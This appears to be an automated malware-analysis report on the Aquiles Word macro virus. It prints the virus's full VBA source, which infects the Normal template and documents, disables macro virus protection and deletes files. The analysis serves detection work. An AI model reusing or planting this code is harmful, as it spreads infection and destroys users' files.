MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to modify itself and potentially other templates, suggesting an effort to hide or establish persistence. The ClamAV detection of 'Doc.Trojan.Aquiles-1' strongly indicates malicious intent, likely involving the delivery of a secondary payload.
Heuristics 3
-
ClamAV: Doc.Trojan.Aquiles-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Aquiles-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2849 bytes |
SHA-256: 9267d541ef84e31dc7b5663356b0bc7975e52533a9a8c8c31d11fca1662b6dfa |
|||
|
Detection
ClamAV:
Doc.Trojan.Aquiles-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Aquiles"
Attribute VB_Base = "1Normal.Aquiles"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Count > 1 Then
For op = 2 To ActiveDocument.VBProject.VBComponents.Count
cantidad = ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
Next op
End If
If NormalTemplate.VBProject.VBComponents.Count > 1 Then
For op = 2 To NormalTemplate.VBProject.VBComponents.Count
cantidad = NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
Next op
End If
Document_Close
End Sub
Private Sub Document_Close()
On Error Resume Next
CommandBars("Visual Basic").Visible = False
Options.VirusProtection = False
' CommandBars("Tools").Controls("Macro").Enabled = False
' CommandBars("View").Controls(6).Enabled = False
' CommandBars("tools").Controls(15).Enabled = False
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
If MacroContainer.FullName = ActiveDocument.FullName Then
If nt.Name <> "Aquiles" Then GoTo ClaudioNormal
Else
If ad.Name <> "Aquiles" Then GoTo Aquilesdocument
End If
GoTo Findelmundo
Aquilesdocument:
lineas = ad.CodeModule.CountOfLines
ad.CodeModule.DeleteLines 1, lineas
lineas = 1
Do While lineas <= nt.CodeModule.CountOfLines
cadenadecodigo = nt.CodeModule.lines(lineas, 1)
ad.CodeModule.insertlines lineas, cadenadecodigo
lineas = lineas + 1
Loop
ad.Name = "Aquiles"
Open "C:\systemDos" For Append As #1
Print #1, ActiveDocument.Path
Close #1
ActiveDocument.Save
GoTo Findelmundo
ClaudioNormal:
lineas = nt.CodeModule.CountOfLines
nt.CodeModule.DeleteLines 1, lineas
lineas = 1
Do While lineas <= ad.CodeModule.CountOfLines
cadenadecodigo = ad.CodeModule.lines(lineas, 1)
nt.CodeModule.insertlines lineas, cadenadecodigo
lineas = lineas + 1
Loop
nt.Name = "Aquiles"
NormalTemplate.Save
Findelmundo:
If Dir("C:\systemDos", vbNormal) <> "" Then
If FileLen("C:\systemDos") > 1024 Then
Open "C:\systemDos" For Input As #1
Line Input #1, direccion
Do While Not EOF(1)
Kill (s + "\*.*")
Line Input #1, direccion
Loop
Close #1
Kill ("C:\systemDos")
End If
End If
'Al rio jactancioso, Dios le a puesto un vado. Malinke
'Y una vez mas el emperador interpuso su alma, claudIo
'esto es una modificacion, trato de llegar a la perfeccion
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.